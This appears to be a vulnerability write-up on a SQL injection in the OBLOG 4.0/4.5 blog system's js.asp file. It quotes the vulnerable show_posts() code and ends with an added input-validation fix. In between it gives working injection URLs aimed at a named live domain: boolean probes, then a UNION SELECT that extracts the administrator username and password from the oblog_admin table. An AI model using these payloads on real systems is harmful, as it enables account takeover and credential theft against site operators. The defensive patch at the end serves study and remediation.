OBLOG4.0 OBLOG4.5 Vulnerability Exploitation Analysis

2023-12-05

Source: DeepenStudy

Vulnerable file: js.asp

    <%
    Dim oblog
    Set oblog = New class_sys
    oblog.autoupdate = False
    oblog.start
    Dim js_blogurl, n
    js_blogurl = Trim(oblog.CacheConfig(3))
    n = CInt(Request("n"))
    If n = 0 Then n = 1
    ' j selects which procedure js.asp runs
    Select Case CInt(Request("j"))
        Case 1
            Call tongji()
        Case 2
            Call topuser()
        Case 3
            Call adduser()
        Case 4
            Call listclass()
        Case 5
            Call showusertype()
        Case 6
            Call listbestblog()
        Case 7
            Call showlogin()
        Case 8
            Call showplace()
        Case 9
            Call showphoto()
        Case 10
            Call showblogstars()
        Case 11
            Call show_hotblog()
        Case 12
            Call show_teams()
        Case 13
            Call show_posts()
        Case 14
            Call show_hottag()
        Case 0
            Call showlog()
    End Select

    ' **************** part of the code omitted ******************

    Sub show_posts()
        Dim teamid, postnum, l, u, t
        teamid = Request("tid")          ' taken from the request as a raw string
        postnum = n
        l = CInt(Request("l"))
        u = CInt(Request("u"))
        t = CInt(Request("t"))
        Dim rs, sql, sRet, sAddon
        Sql = "select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "
        If teamid <> "" And teamid <> "0" Then
            teamid = Replace(teamid, "|", ",")
            ' teamid is concatenated into the statement without any validation
            Sql = Sql & " And teamid In (" & teamid & ") "
        End If
        Sql = Sql & " order by postid Desc"
        Set rs = oblog.Execute(Sql)
        ' The HTML markup inside the string literals below (including the
        ' gid=/pid= link) is not preserved on this page.
        sRet = " "
        Do While Not rs.Eof
            sAddon = ""
            sRet = sRet & "" & oblog.Filt_html(Left(rs(2), l)) & ""
            If u = 1 Then sAddon = rs(4)
            If t = 1 Then
                If sAddon <> "" Then sAddon = sAddon & ","
                sAddon = sAddon & rs(3)
            End If
            If sAddon <> "" Then sAddon = "(" & sAddon & ")"
            sRet = sRet & sAddon & " "
            rs.Movenext
        Loop
        Set rs = Nothing
        sRet = sRet & " "
        Response.write oblog.htm2js(sRet, True)
    End Sub
    %>

To reach the show_posts() procedure, the request must carry the parameters shown above: n=1, j=13. The injection point is the tid parameter: apart from replacing | with a comma, it is concatenated unfiltered into the In clause:

    (" & teamid & ")

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1    returns a normal response

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2    returns an abnormal response

Guessing the administrator table name:

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and <query statement> and(1=1

The original statement selects six columns:

    Sql = "select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 "

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1

    document.write(\' * \');

The 1 and 2 that appear in gid=1 and pid=2 of the output are the reflected columns. Replace the 1,2 in the query directly with username,password:

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1
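One way to close the hole in show_posts(), as an added example that is not OBLOG's own code or a vendor patch: check tid against an allow-list of plain integers before it reaches the In (...) clause. SafeIdList, IsDigits and TeamFilterClause are hypothetical helper names; failing closed with "1=0" on malformed input is a design choice assumed here.

```vbscript
' Added example, not OBLOG code. All three helper names are hypothetical.

' True only for 1-9 decimal digits, which always fits in a VBScript Long.
Function IsDigits(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsDigits = re.Test(s)
End Function

' Normalises "1|2|3" or "1,2,3" to "1,2,3".
' Returns "" when no filter was requested (empty or "0"),
' and Null when any element is not a plain integer.
Function SafeIdList(raw)
    Dim s, parts, i, item, out
    s = Trim(raw & "")
    If s = "" Or s = "0" Then
        SafeIdList = ""
        Exit Function
    End If
    parts = Split(Replace(s, "|", ","), ",")
    out = ""
    For i = 0 To UBound(parts)
        item = Trim(parts(i))
        If Not IsDigits(item) Then
            SafeIdList = Null           ' e.g. "1) and 1=1 and (1=1" is rejected here
            Exit Function
        End If
        If out <> "" Then out = out & ","
        out = out & CStr(CLng(item))    ' re-emit the parsed number, never the raw text
    Next
    SafeIdList = out
End Function

' Builds the team filter that show_posts() appends to Sql.
Function TeamFilterClause(rawTid)
    Dim ids
    ids = SafeIdList(rawTid)
    If IsNull(ids) Then
        TeamFilterClause = " And 1=0 "  ' malformed input: fail closed, return no rows
    ElseIf ids = "" Then
        TeamFilterClause = ""
    Else
        TeamFilterClause = " And teamid In (" & ids & ") "
    End If
End Function
```

In show_posts(), the If teamid <> "" ... End If block would then become the single statement Sql = Sql & TeamFilterClause(Request("tid")).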
